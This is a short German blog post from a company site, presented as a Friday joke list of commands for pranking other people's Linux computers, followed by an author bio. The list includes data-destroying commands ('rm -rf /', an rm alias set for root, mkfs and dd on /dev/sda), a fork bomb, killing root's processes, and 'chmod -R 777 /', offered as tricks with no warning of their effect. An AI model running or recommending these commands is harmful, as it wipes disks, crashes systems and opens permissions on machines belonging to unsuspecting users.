Es ist Freitag und meiner Meinung nach wieder einmal Zeit für einen nicht ganz so sinnvollen Blogpost. Die hier aufgeführte Liste an Kommandos ist ideal um den Linux-Rechner eurer Mitmenschen ein wenig zu “tunen”. Mein persönlicher Favorit und daher Platz Nr. 1 ist ein alias auf rm. Diese hübsche, kleine Modifikation sollte natürlich beim Benutzer root gemacht werden 😉
Platz 1:

alias rm='rm -rf /'

Platz 2:

rm -rf /

Platz 3:

:(){:|:&};:

Platz 4:

mkfs.ext3 /dev/sda

Platz 5:

dd if=/dev/null of=/dev/sda

Platz 6:

killall -u root

Platz 7:

chmod -R 777 /

Platz 8: 

rm -rf . *

Platz 9:

while true; do echo "I'm only testing..." | wall; done

Platz 10:

beep -f 659 -l 460 -n -f 784 -l 340 -n -f 659 -l 230 -n -f 659 -l 110 -n -f 880 -l 230 -n -f 659 -l 230 -n -f 587 -l 230 -n -f 659 -l 460 -n -f 988 -l 340 -n -f 659 -l 230 -n -f 659 -l 110 -n -f 1047-l 230 -n -f 988 -l 230 -n -f 784 -l 230 -n -f 659 -l 230 -n -f 988 -l 230 -n -f 1318 -l 230 -n -f 659 -l 110 -n -f 587 -l 230 -n -f 587 -l 110 -n -f 494 -l 230 -n -f 740 -l 230 -n -f 659 -l 460

Mehr von den Beep-Melodies findet ihr im Debian Forum 🙂

Tobias Redel
Tobias Redel
Head of Professional Services

Tobias hat nach seiner Ausbildung als Fachinformatiker bei der Deutschen Telekom bei T-Systems gearbeitet. Seit August 2008 ist er bei NETWAYS, wo er in der Consulting-Truppe unsere Kunden in Sachen Open Source, Monitoring und Systems Management unterstützt. Insgeheim führt er jedoch ein Doppelleben als Travel-Hacker, arbeitet an seiner dritten Millionen Euro (aus den ersten beiden ist nix geworden) und versucht die Weltherrschaft an sich zu reißen.